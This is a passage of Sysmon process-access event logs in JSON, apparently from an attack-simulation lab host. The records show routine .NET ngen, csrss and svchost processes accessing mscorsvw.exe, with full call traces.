05:58:34.793","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048A-5F25-0000-001006930D00}","TargetProcessId":"5100","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6843,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:34.824\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048A-5F25-0000-001097960D00}\r\nTargetProcessId: 4560\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:34.824","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048A-5F25-0000-001097960D00}","TargetProcessId":"4560","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6844,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:34.824\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048A-5F25-0000-001097960D00}\r\nTargetProcessId: 4560\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:34.824","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048A-5F25-0000-001097960D00}","TargetProcessId":"4560","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6845,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:34.839\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048A-5F25-0000-001097960D00}\r\nTargetProcessId: 4560\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:34.839","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048A-5F25-0000-001097960D00}","TargetProcessId":"4560","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6846,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:34.855\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048A-5F25-0000-0010E1990D00}\r\nTargetProcessId: 4916\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:34.855","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048A-5F25-0000-0010E1990D00}","TargetProcessId":"4916","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6847,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:34.855\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048A-5F25-0000-0010E1990D00}\r\nTargetProcessId: 4916\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:34.855","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048A-5F25-0000-0010E1990D00}","TargetProcessId":"4916","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6848,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:34.871\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048A-5F25-0000-0010E1990D00}\r\nTargetProcessId: 4916\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:34.871","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-048A-5F25-0000-0010E1990D00}","TargetProcessId":"4916","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:34","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6849,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:34.918\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048A-5F25-0000-0010BA9D0D00}\r\nTargetProcessId: 4940\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:34.918","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048A-5F25-0000-0010BA9D0D00}","TargetProcessId":"4940","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\